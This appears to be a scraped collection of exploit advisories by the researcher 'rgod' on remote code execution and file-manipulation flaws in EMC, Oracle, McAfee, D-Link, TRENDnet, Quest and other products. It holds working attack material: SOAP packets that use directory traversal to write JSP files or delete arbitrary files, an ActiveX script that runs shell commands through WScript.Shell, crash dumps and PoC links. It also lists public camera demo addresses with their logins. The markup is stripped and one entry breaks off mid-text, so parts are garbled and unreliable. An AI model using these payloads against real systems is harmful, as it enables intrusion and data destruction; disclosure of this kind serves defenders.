EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution
EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution tested against: Microsoft Windows Server 2008 r2 sp1 EMC Data Protection Advisor 5.8 sp5 vulnerability: the DPA Illuminator service (DPA_Illuminator.exe) listening on public port 8090 (tcp/http) and 8453 (tcp/https) is vulnerable. It exposes the following servlet: http://[host]:8090/invoker/EJBInvokerServlet https://[host]:8453//invoker/EJBInvokerServlet due to a bundled invoker.war The result is remote code execution with NT AUTHORITY\SYSTEM privileges. proof of concept url: http://retrogod.altervista.org/9sg_ejb.html ~rgod~
Symantec Workspace Streaming 7.5.0.493 SWS Streamlet Engine Invoker Servlets Remote Code Execution
Symantec Workspace Streaming 7.5.0.493 SWS Streamlet Engine Invoker Servlets Remote Code Execution tested against: Microsoft Windows Server 2008 R2 sp1 download url: http://www.symantec.com/it/it/products-solutions/trialware/ file tested: Symantec_Workspace_Streaming_7.5.0.493.zip vulnerability: the SWS Streamlet Engine service (as_ste.exe) listening on public port 9832 (tcp/http) is vulnerable. It exposes the following servlet http://[host]:9832/invoker/EJBInvokerServlet http://[host]:9832/invoker/JMXInvokerServlet due to a bundled invoker.sar The result is remote code execution with NT AUTHORITY\SYSTEM privileges. proof of concept url: http://retrogod.altervista.org/9sg_ejb.html ~rgod~
Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows
Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows
ActiveX settings:
Binary path: C:\Program Files (x86)\Borland\CaliberRM\emsmtp.dll
Version: 5.0.0.11
ProgID: EasyMail.SMTP.5
CLSID: {4610E7BF-710F-11D3-813D-00C04F6B92D0}
Safe for Scripting: True
Safe for Initialization: True
SubmitToExpress and AddAttachment methods are vulnerable see CVE-2007-4607
and CVE-2009-4663
//rgod
Borland Silk Central 12.1 TeeChart Pro Activex control AddSeries Remote Code Execution
Borland Silk Central 12.1 TeeChart Pro Activex control AddSeries Remote Code
Execution
ActiveX Settings:
Binary path: C:\Program Files\Silk\Shared Files\teechart.ocx
CLSID: {008BBE7E-C096-11D0-B4E3-00A0C901D681}
ProgID: TeeChart.TChart
Version: 4.0.0.7
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
AddSeries method is vulnerable, see http://www.osvdb.org/show/osvdb/74446
//rgod
Oracle Business Transaction Management Server FlashTunnelService WriteToFile Message Remote Code Execution
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService
WriteToFile Message Remote Code Execution Exploit
tested against: Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7
(Production version)
files tested:
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url:
http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
BTM_Servers_12.1.0.2.7.zip (BTM, production version)
download url:
http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html
vulnerability:
the mentioned product installs a web service
called FlashTunnelService which can be reached
without prior authentication and processes incoming
SOAP requests.
It can be reached at the following uri:
http://[host]:7001/btmui/soa/flash_svc/
This soap interface exposes the writeToFile function
which could allow to write arbitrary files on the target
server.
Example packet:
POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: http://soa.amberpoint.com/writeToFile;
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.0.1:7001
Content-Length: [length]
soapenv:Envelope xmlns:soapenv=http://schemas.xmlsoap.org/soap/envelope/;
xmlns:int=http://schemas.amberpoint.com/flashtunnel/interfaces;
xmlns:typ=http://schemas.amberpoint.com/flashtunnel/types;
soapenv:Header/
soapenv:Body
int:writeToFileRequest
int:writeToFile handle=..\..\..\..\..\..\..\..\[path]\somefile.jsp
!--Zero or more repetitions:--
typ:text[code]/typ:text
!--Optional:--
typ:WriteToFileRequestVersion
!--You may enter ANY elements at this point--
/typ:WriteToFileRequestVersion
/int:writeToFile
/int:writeToFileRequest
/soapenv:Body
/soapenv:Envelope
the 'handle' property can be used to control the location
of the newly written file (it suffers of a directory traversal ulnerability).
File extension can also be controlled.
File content can be controlled through the 'text' element (note that one
must convert the code to html entities firstly, the soap interface
will reconvert it to his original format).
Given this, a remote attacker, could place an arbitrary jsp script
inside the main web server root path, then execute arbitrary code
with the privileges of the weblogic installation, usually Administrator
privileges).
vulnerable code, see the decompiled
com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl.class
..
public IWriteToFileResponse writeToFile(IWriteToFileRequest request)
throws SOAPFaultException
{
WriteToFileResponse wtfr = new WriteToFileResponse();
String handle = request.getHandle();
TypedList text = request.getText();
if(text != null text.size() 0)
{
File f = getFileFromHandle(handle);
if(f != null)
try
{
FileOutputStream fos = new FileOutputStream(f);
OutputStreamWriter osw = new OutputStreamWriter(fos,
UTF-8);
int i = 0;
for(int ii = text.size(); i ii; i++)
{
String s = (String)text.get(i);
osw.write(s);
osw.write(\n);
}
osw.close();
}
catch(IOException ex)
{
logger.log(Level.SEVERE, (new
StringBuilder()).append(IOException writing
').append(f.toString()).append(': ).append(ex.getMessage()).toString());
}
}
return wtfr;
}
..
As attachment, proof of concept code written in php, launch from the command
line, modify for your own use.
poc: http://retrogod.altervista.org/9sg_ora.htm
rgod
Oracle Business Transaction Management Server FlashTunnelService Remote File Deletion
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService
Remote File Deletion
tested against: Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7
(Production version)
files tested:
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url:
http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
BTM_Servers_12.1.0.2.7.zip (BTM, production version)
download url:
http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html
vulnerability:
the mentioned product installs a web service
called FlashTunnelService which can be reached
without prior authentication and processes incoming
SOAP requests.
It can be reached at the following uri:
http://[host]:7001/btmui/soa/flash_svc/
This soap interface exposes the 'deleteFile' function
which could allow to delete arbitrary files with administrative
privileges on the target
server through a directory traversal vulnerability.
This could be useful for further attacks.
Example packet:
POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: http://soa.amberpoint.com/deleteFile;
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]
soapenv:Envelope xmlns:soapenv=http://schemas.xmlsoap.org/soap/envelope/;
xmlns:int=http://schemas.amberpoint.com/flashtunnel/interfaces;
xmlns:typ=http://schemas.amberpoint.com/flashtunnel/types;
soapenv:Header/
soapenv:Body
int:deleteFileRequest
int:deleteFile
handle=../../../../../../../../../../../../somepath/somefile.ext
typ:DeleteFileRequestVersion
/typ:DeleteFileRequestVersion
/int:deleteFile
/int:deleteFileRequest
/soapenv:Body
/soapenv:Envelope
Vulnerable code, see the decompiled
com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:
..
public IDeleteFileResponse deleteFile(IDeleteFileRequest request)
throws SOAPFaultException
{
DeleteFileResponse dfr = new DeleteFileResponse();
String handle = request.getHandle();
File f = getFileFromHandle(handle);
if(f != null)
f.delete();
return dfr;
}
..
As attachment, proof of concept code.
poc: http://retrogod.altervista.org/9sg_ora2.htm
rgod
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution tested against: Microsoft Windows Vista sp2 Microsoft Windows Server 2003 r2 sp2 Mozilla Firefox 14.0.1 download url: http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe (this was the update for a previous vulnerability, see ZDI-12-098) see also the installer aol_toolbar_pricecheck.exe url: http://toolbar.aol.com/download_files/download-helper.html?brand=aola=111ncid=txtlnkusdown0043 vulnerability: the mentioned product installs a Firefox plugin: File: npdnupdater2.dll Version: 1.3.0.0 Name: npdnupdater2 Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll Mime type: applicatiotn/x-vend.aol.dnupdater2.1 Extension: ocp By embedding this plugin inside an html page is possible to trigger a buffer overflow vulnerability through the 'SRC' parameter. Example crash: EAX ECX 01101470 EDX 01135208 ASCII EBX ESP 0013F618 EBP 0013F634 ESI 0002 EDI 0013F668 EIP 61616161 C 1 ES 0023 32bit 0() P 1 CS 001B 32bit 0() A 1 SS 0023 32bit 0() Z 0 DS 0023 32bit 0() S 1 FS 003B 32bit 7FFDD000(4000) T 0 GS NULL D 0 O 0 LastErr ERROR_SUCCESS EFL 0297 (NO,B,NE,BE,S,PE,L,LE) ST0 empty 0.0 ST1 empty 0.0 ST2 empty 0.0 ST3 empty 0.0 ST4 empty 0.0 ST5 empty 0.0 ST6 empty 8.000 ST7 empty 0.250 CONST 1/4. 3 2 1 0 E S P U O Z D I FST 0120 Cond 0 0 0 1 Err 0 0 1 0 0 0 0 0 (LT) FCW 027F Prec NEAR,53 Mask1 1 1 1 1 1 Last cmnd 001B:10571FBD xul.10571FBD XMM0 XMM1 61616161 61616161 61616161 61616161 XMM2 61616161 61616161 61616161 61616161 XMM3 61616161 61616161 61616161 61616161 XMM4 61616161 61616161 61616161 61616161 XMM5 61616161 61616161 61616161 61616161 XMM6 61616161 61616161 61616161 61616161 XMM7 61616161 61616161 61616161 61616161 P U O Z D I MXCSR 1F80 FZ 0 DZ 0 Err 0 0 0 0 0 0 Rnd NEAR Mask 1 1 1 1 1 1 EIP is overwritten, also EDX points to user-supplied code (this can be done by setting an overlong fake parameter, see poc). As attachment, proof of concept code. a copy loop [*] is involved in overwriting a certain memory region. The subsequent code can be used to call inside this memory region [**]. See npdnupdater2.dll: CPU Disasm Address Hex dump Command Comments 01A91C10 /$ 55PUSH EBP ; npdnupdater2.01A91C10(guessed Arg1) 01A91C11 |. 56PUSH ESI 01A91C12 |. 8BE9 MOV EBP,ECX 01A91C14 |. 57PUSH EDI 01A91C15 |. 8B7C24 10 MOV EDI,DWORD PTR SS:[ARG.1] 01A91C19 |. C745 00 9CA2A MOV DWORD PTR SS:[EBP],OFFSET 01A9A29C 01A91C20 |. 8B07 MOV EAX,DWORD PTR DS:[EDI] 01A91C22 |. 33F6 XOR ESI,ESI 01A91C24 |. 8945 04 MOV DWORD PTR SS:[EBP+4],EAX 01A91C27 |. C645 08 00MOV BYTE PTR SS:[EBP+8],0 01A91C2B |. C745 10 0 MOV DWORD PTR SS:[EBP+10],0 01A91C32 |. 66:3977 0ACMP WORD PTR DS:[EDI+0A],SI 01A91C36 |. 7E 3E JLE SHORT 01A91C76 01A91C38 |. EB 06 JMP SHORT 01A91C40 01A91C3A | 8D9B LEA EBX,[EBX] 01A91C40 | 8B4F 0C /MOV ECX,DWORD PTR DS:[EDI+0C] 01A91C43 |. 8B14B1|MOV EDX,DWORD PTR DS:[ESI*4+ECX] 01A91C46 |. 68 D4A2A901 |PUSH OFFSET 01A9A2D4; /Arg2 = ASCII SRC 01A91C4B |. 52|PUSH EDX; |Arg1 01A91C4C |. E8 E06F |CALL 01A98C31- ; \npdnupdater2.01A98C31 01A91C51 |. 83C4 08 |ADD ESP,8 01A91C54 |. 85C0 |TEST EAX,EAX 01A91C56 |. 75 15 |JNE SHORT 01A91C6D 01A91C58 |. 8B47 10 |MOV EAX,DWORD PTR DS:[EDI+10] 01A91C5B |. 8B0CB0|MOV ECX,DWORD PTR DS:[ESI*4+EAX] 01A91C5E |. BA 38CCA901 |MOV EDX,OFFSET 01A9CC38 ; ASCII ... 01A91C63 | 8A01 |/MOV AL,BYTE PTR DS:[ECX] - [*] 01A91C65 |. 41||INC ECX 01A91C66 |. 8802 ||MOV BYTE PTR DS:[EDX],AL 01A91C68 |. 42||INC EDX 01A91C69 |. 84C0 ||TEST AL,AL 01A91C6B |.^ 75 F6 |\JNE SHORT 01A91C63 01A91C6D | 0FBF4F 0A |MOVSX ECX,WORD PTR DS:[EDI+0A] 01A91C71 |. 46|INC ESI 01A91C72 |. 3BF1 |CMP ESI,ECX 01A91C74 |.^ 7C CA \JL SHORT 01A91C40 01A91C76 | 5FPOP EDI 01A91C77 |. 5EPOP ESI 01A91C78 |. 8BC5 MOV EAX,EBP 01A91C7A |. 5DPOP EBP 01A91C7B \. C2 0400 RETN 4 01A91C7E CCINT3
Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer Overflow Vulnerability
Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer Overflow Vulnerability download url of a test version: http://www.adobe.com/cfusion/tdrc/index.cfm?product=photoshop Note: Found three weeks before the CS6 release. I could not reproduce against CS6, cannot say if there is a CVE for this, I think is also possible they patched silently. However this leaves a lot of Photoshop installations vulnerable. vulnerability: A buffer overflow exists in the way Photoshop parses Collada (*.DAE) asset elements, example file: .. ?xml version=1.0? COLLADA xmlns=http://www.collada.org/2005/11/COLLADASchema; version=1.4.1 asset contributor authorrgod/author authoring_toolMaya 8.0 | ColladaMaya v3.02 | FCollada v3.2/authoring_tool commentsCollada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0; curveConstrainSampling=0;exportCameraAsLookat=0; exportLights=1;exportCameras=1;exportJointsAndSkin=1; exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0; exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0; exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1; dereferenceXRefs=0;cameraXFov=0;cameraYFov=1... /comments .. While trying to convert the element field from ASCII to Unicode the U3D.B8I library plugin does a miscalculation in allocating a buffer for the user-supplied string then overwrite the stack with the user-controlled buffer. Critical structures are overwritten (SEH), also the arguments of a subsequent memcpy() are used-controlled. vulnerable code, theese routines u3d.8bi (this is repeated one time for each byte of the string), run trace: .. 10A05C30 55 pushebp 10A05C31 8BEC mov ebp, esp 10A05C33 83EC 10 sub esp, 10 10A05C36 8B45 08 mov eax, dword ptr ss:[ebp+8] 10A05C39 0345 0C add eax, dword ptr ss:[ebp+C] 10A05C3C 8945 F8 mov dword ptr ss:[ebp-8], eax 10A05C3F 8B4D 0C mov ecx, dword ptr ss:[ebp+C] 10A05C42 894D F4 mov dword ptr ss:[ebp-C], ecx 10A05C45 8B55 F4 mov edx, dword ptr ss:[ebp-C] 10A05C48 83EA 01 sub edx, 1 10A05C4B 8955 F4 mov dword ptr ss:[ebp-C], edx 10A05C4E 837D F4 03 cmp dword ptr ss:[ebp-C], 3 10A05C52 77 0Aja short U3D.10A05C5E 10A05C54 8B45 F4 mov eax, dword ptr ss:[ebp-C] 10A05C57 FF2485 A45DA010 jmp dword ptr ds:[eax*4+10A05DA4] .. .. 10A05D6A 8B4D 08 mov ecx, dword ptr ss:[ebp+8] 10A05D6D 0FB611 movzx edx, byte ptr ds:[ecx] 10A05D70 81FA 8000cmp edx, 80 10A05D76 7C 12jl short U3D.10A05D8A 10A05D78 8B45 08 mov eax, dword ptr ss:[ebp+8] 10A05D7B 0FB608 movzx ecx, byte ptr ds:[eax] 10A05D7E 81F9 C200cmp ecx, 0C2 10A05D84 7D 04jge short U3D.10A05D8A 10A05D86 32C0 xor al, al 10A05D88 EB 13jmp short U3D.10A05D9D 10A05D8A 8B55 08 mov edx, dword ptr ss:[ebp+8] 10A05D8D 0FB602 movzx eax, byte ptr ds:[edx] 10A05D90 3D F400 cmp eax, 0F4 10A05D95 7E 04jle short U3D.10A05D9B 10A05D97 32C0 xor al, al 10A05D99 EB 02jmp short U3D.10A05D9D 10A05D9B B0 01mov al, 1 10A05D9D 8BE5 mov esp, ebp 10A05D9F 5D pop ebp 10A05DA0 C3 retn .. .. 10A05E4B 83C4 08 add esp, 8 10A05E4E 0FB6D0 movzx edx, al 10A05E51 85D2 testedx, edx 10A05E53 75 0Cjnz short U3D.10A05E61 10A05E55 C745 F8 0300 mov dword ptr ss:[ebp-8], 3 10A05E5C E9 1502 jmp U3D.10A06076 10A05E61 0FB745 F0movzx eax, word ptr ss:[ebp-10] 10A05E65 8945 E8 mov dword ptr ss:[ebp-18], eax 10A05E68 837D E8 05 cmp dword ptr ss:[ebp-18], 5 10A05E6C 0F87 B500ja U3D.10A05F27 10A05E72 8B4D E8 mov ecx, dword ptr ss:[ebp-18] 10A05E75 FF248D 9060A010 jmp dword ptr ds:[ecx*4+10A06090] .. .. 10A05F12 8B4D F4 mov ecx, dword ptr ss:[ebp-C] 10A05F15 0FB611 movzx edx, byte ptr ds:[ecx] 10A05F18 0355 EC add edx, dword ptr ss:[ebp-14] 10A05F1B 8955 EC mov dword ptr ss:[ebp-14], edx 10A05F1E 8B45 F4 mov eax, dword ptr ss:[ebp-C] 10A05F21 83C0 01 add eax, 1 10A05F24 8945 F4 mov dword ptr ss:[ebp-C], eax 10A05F27 0FB74D F0movzx ecx, word ptr ss:[ebp-10] 10A05F2B 8B55 EC mov edx, dword ptr ss:[ebp-14] 10A05F2E 2B148D 5034B110 sub edx, dword ptr ds:[ecx*4+10B1345 10A05F35 8955 EC mov
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution Vulnerability
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control
GetObject() Security Bypass Remote Code Execution Vulnerability
tested against: Microsoft Windows Vista sp2
Microsoft Windows 2003 r2 sp2
Internet Explorer 7/8/9
product homepage:
http://www.mcafee.com/it/downloads/free-tools/virtual-technician.aspx
file tested: MVTInstaller.exe
background:
the mentioned product installs an ActiveX control with
the following settings:
Binary path: C:\Program Files\McAfee\Supportability\MVT\MVT.dll
ProgID: MVT.MVTControl.6300
CLSID: {2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety: false
According to IObjectSafety interface, this control is
safe for scripting, then Internet Explorer will allow
scripting from remote.
Vulnerability:
this control offers the vulnerable GetObject() function,
see typelib:
..
/* DISPID=3 */
/* VT_VARIANT [12] */
function GetObject(
/* VT_VARIANT [12] [in] */ $in_dwObjectID
)
{
/* method GetObject */
}
..
by specifing the ProgID of an arbitrary class from
the underlying operating system, with no regards for browser security,
is possible to load ex. the WScript.Shell class.
The returned object now offers the Exec() method
which can be used to launch operating system commands.
Example of attack:
object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' /
/object
script defer=defer
var x = obj.GetObject(WScript.Shell);
x.Exec(cmd /c start calc);
/script
it is also possible to crash the browser
by specifying an arbitrary memory address
object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' /
/object
script defer=defer
var x = obj.GetObject(0x0c0c0c0c);
/script
example crash:
eax=0c0c0c0c ebx=0197085c ecx=01b5efec edx=008e esi=01b5efec edi=01b5f344
eip=77bd8efa esp=01b5ef80 ebp=01b5ef80 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206
msvcrt!wcslen+0x8:
77bd8efa 668b08 mov cx,word ptr [eax]ds:0023:0c0c0c0c=
debugger shows an access violation while reading 0x0c0c0c0c,
this could be also exploitable but not demonstrated at the time of this report
As attachment, proof of concept code which executes calc.exe, then crash IE.
additional note:
0:010 lm -vm mvt
startendmodule name
0345 034b8000 MVT(deferred)
Image path: D:\Program Files\McAfee\Supportability\MVT\MVT.dll
Image name: MVT.dll
Timestamp:Thu Jan 12 07:37:26 2012 (4F0E7FA6)
CheckSum: 0006C308
ImageSize:00068000
File version: 6.3.0.1911
Product version: 6.3.0.1911
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type:2.0 Dll
File date:.
Translations: 0409.04e4
CompanyName: McAfee, Inc.
ProductName: McAfee Virtual Technician
InternalName: MVT.dll
OriginalFilename: MVT.dll
ProductVersion: 6.3.0.1911
FileVersion: 6.3.0.1911
FileDescription: McAfee, Inc.
LegalCopyright: ©2011 McAfee, Inc. All Rights Reserved.
//rgod
original url: http://retrogod.altervista.org/9sg_mcafee_vt_adv.htm
poc: http://retrogod.altervista.org/9sg_mcafee_vt_ax.htm
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:
File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
Vulnerability:
This ActiveX control exposed the vulnerable
OpenFileDlg() method, see typelib:
..
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
/* VT_BSTR [8] [in] */ $sFilter
)
{
/* method OpenFileDlg */
}
..
By invoking this method with an overlong argument is possible
to overflow a buffer. This is because of an insecure
WideCharToMultiByte() call inside UltraMJCamX.ocx:
Call stack of main thread
AddressStack Procedure / arguments
Called from Frame
001279FC 77E6F20B kernel32.77E637DE
kernel32.77E6F206 00127A0C
00127A10 0299F958 kernel32.WideCharToMultiByte
UltraMJC.0299F952 00127A0C
00127A14 0003 CodePage = 3
00127A18 Options = 0
00127A1C 03835C5C WideCharStr =
00127A20 WideCharCount = (-1.)
00127A24 00127A50 MultiByteStr = 00127A50
00127A28 7532 MultiByteCount = 7532 (30002.)
00127A2C pDefaultChar = NULL
00127A30 pDefaultCharUsed = NULL
00127A3C 029B11D0 UltraMJC.0299F920
UltraMJC.029B11CB 00127A38
..
0299F934 8B45 08 mov eax,dword ptr ss:[ebp+8]
0299F937 C600 00 mov byte ptr ds:[eax],0
0299F93A 6A 00push 0
0299F93C 6A 00push 0
0299F93E 8B4D 10 mov ecx,dword ptr ss:[ebp+10]
0299F941 51 push ecx
0299F942 8B55 08 mov edx,dword ptr ss:[ebp+8]
0299F945 52 push edx
0299F946 6A FFpush -1
0299F948 8B45 0C mov eax,dword ptr ss:[ebp+C]
0299F94B 50 push eax
0299F94C 6A 00push 0
0299F94E 8B4D 14 mov ecx,dword ptr ss:[ebp+14]
0299F951 51 push ecx
0299F952 FF15 20319F02call dword ptr ds:[KERNEL32.WideCharTo;
kernel32.WideCharToMultiByte
..
The result is that critical structures are overwritten (SEH)
allowing to execute arbitrary code against the target browser.
As attachment, basic proof of concept code.
original url: http://retrogod.altervista.org/9sg_trendnet_adv.htm
poc: http://retrogod.altervista.org/9sg_trendnet_poc.htm
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll
Uninitialized Pointer Remote Code Execution
homepage: http://www.quest.com/intrust/
description: InTrust securely collects, stores, reports and
alerts on event log data from Windows, Unix and Linux systems,
helping you comply with external regulations, internal policies
and security best practices.
download url of a test version:
http://www.quest.com/downloads/
file tested: Quest_InTrust---Full-Package_104.zip
Background:
The mentioned product installs an ActiveX control
with the following settings:
binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so
Internet Explorer will allow scripting of this control
from remote.
Vulnerability:
By invoking the Add() method is
possible to call inside a memory region of choice
set by the attacker through ex. heap spray or other
tecniques.
Example code:
object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' /
/object
script
obj.Add(0x76767676,1);
/script
..
eax=76767676 ebx=4401e51c ecx=01f85340 edx= esi=01f85340 edi=0001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244 calldword ptr ANNOTA_1!DllUnregisterServer+0x19235
(44024a50)[eax*4] ds:0023:1ddc2428=
..
You are in control of eax: fully exploitable.
As attachment, proof of concept code.
original url: http://retrogod.altervista.org/9sg_quest_adv.htm
poc: http://retrogod.altervista.org/9sg_quest_poc.htm
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll
lstrcpyW Remote Buffer Overflow Vulnerability
tested against: Microsoft Windows Server 2003 r2 sp2
Internet Explorer 7/8
Live demo: http://203.125.227.70/eng/index.cgi
username: dlink
password: dlink
product homepage: http://www.d-link.com/products/?pid=771
product description:
The DCS-5605 is a high performance camera for professional surveillance
and remote monitoring. This network camera features motorized pan,
tilt, and optical/digital zoom for ultimate versatility. The 10x optical
zoom lens delivers the level of detail necessary to identify faces, license
plate numbers, and other important details that are difficult to
clearly distinguish using digital zoom alone
background:
When browsing the device web interface, the user
is asked to install an ActiveX control to stream
video content. This control has the following settings:
Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True
Vulnerability:
the ActiveX control exposes the SelectDirectory()
method which supports one optional argument.
See typelib:
..
/* DISPID=22 */
/* VT_BSTR [8] */
function SelectDirectory(
/* VT_VARIANT [12] [in] */ $varDefPath
)
{
/* method SelectDirectory */
}
..
This method suffers of a stack based buffer overflow vulnerability
because an unsafe lstrcpyW() call inside DcsCliCtrl.dll:
..
100712E0 81EC 3404sub esp,434
100712E6 A1 2C841010 mov eax,dword ptr ds:[1010842C]
100712EB 33C4 xor eax,esp
100712ED 898424 3004 mov dword ptr ss:[esp+430],eax
100712F4 53 push ebx
100712F5 8B9C24 4804 mov ebx,dword ptr ss:[esp+448]
100712FC 55 push ebp
100712FD 8BAC24 4004 mov ebp,dword ptr ss:[esp+440]
10071304 56 push esi
10071305 8BB424 4C04 mov esi,dword ptr ss:[esp+44C]
1007130C 57 push edi
1007130D 8BBC24 4C04 mov edi,dword ptr ss:[esp+44C]
10071314 68 0802 push 208
10071319 8D4424 34lea eax,dword ptr ss:[esp+34]
1007131D 6A 00push 0
1007131F 50 push eax
10071320 E8 0BC40300 call DcsCliCt.100AD730
10071325 83C4 0C add esp,0C
10071328 85F6 test esi,esi
1007132A 74 0Cje short DcsCliCt.10071338
1007132C 56 push esi
1007132D 8D4C24 34lea ecx,dword ptr ss:[esp+34]
10071331 51 push ecx
10071332 FF15 D4D20C10call dword ptr ds:[KERNEL32.lstrcpyW] ;
kernel32.lstrcpyW -
..
An attacker could entice a remote user to browse a web
page to gain control of the victim browser, by passing an overlong string to
the mentioned method and overwriting critical structures (SEH).
As attachment proof of concept code.
Note, to reproduce the wanted crash:
when the SelectDirectory() method is called the
user is asked to select a destination folder for the stream recorder.
To set EIP to 0x0c0c0c0c select a folder of choice, then proceed.
When clicking Cancel you have an unuseful crash, however it could be
possible that modifying the poc you will have EIP overwritten aswell.
I think that it is also possible that other products might carry this dll,
I could post an update if I find more.
Additional note:
0:029 lm -vm DcsCliCtrl
startendmodule name
0845 0859e000 DcsCliCtrl (deferred)
Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
Image name: DcsCliCtrl.dll
Timestamp:Thu Aug 19 08:48:47 2010 (4C6CD3CF)
CheckSum: 001325EC
ImageSize:0014E000
File version: 1.0.0.4519
Product version: 1.0.0.1
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type:2.0 Dll
File date:.
Translations: 0409.04e4
ProductName: Camera Streaming Client
InternalName: DcsCliCtrl.dll
OriginalFilename: DcsCliCtrl.dll
ProductVersion: 1.0.0.1
FileVersion: 1.0.0.4519
FileDescription: Camera Stream Client Control
LegalCopyright: Copyright: (c) All rights reserved.
original url: http://retrogod.altervista.org/9sg_dlink_adv.htm
poc: http://retrogod.altervista.org/9sg_dlink_poc.htm
Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Vulnerability
Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll
sprintf Remote Buffer Overflow Vulnerability
Tested against: Microsoft Windows Vista SP2
Microsoft Windows XP SP3
Microsoft Windows 2003 R2 SP2
Internet Explorer 7/8/9
download url of a test version:
http://search.dell.com/results.aspx?c=usl=ens=gencat=supk=Dell+SX2210+monitorrpp=12p=1subcat=dydrf=allnk=fsort=Kira=False~srd=Falseipsys=Falseadvsrch=False~ck=anav
file tested: Dell_SX2210-Monitor_Webcam SW RC1.1_ R230103.exe
This package contains the Dell Webcam Central software
developed by Creative Technologies for Dell.
info:
http://dell-webcam-central.software.informer.com/
http://live-cam-avatar-creator.software.informer.com/
http://www.google.com/search?channel=shl=enbiw=1024bih=581q=13149882-F480-4F6B-8C6A-0764F75B99ED
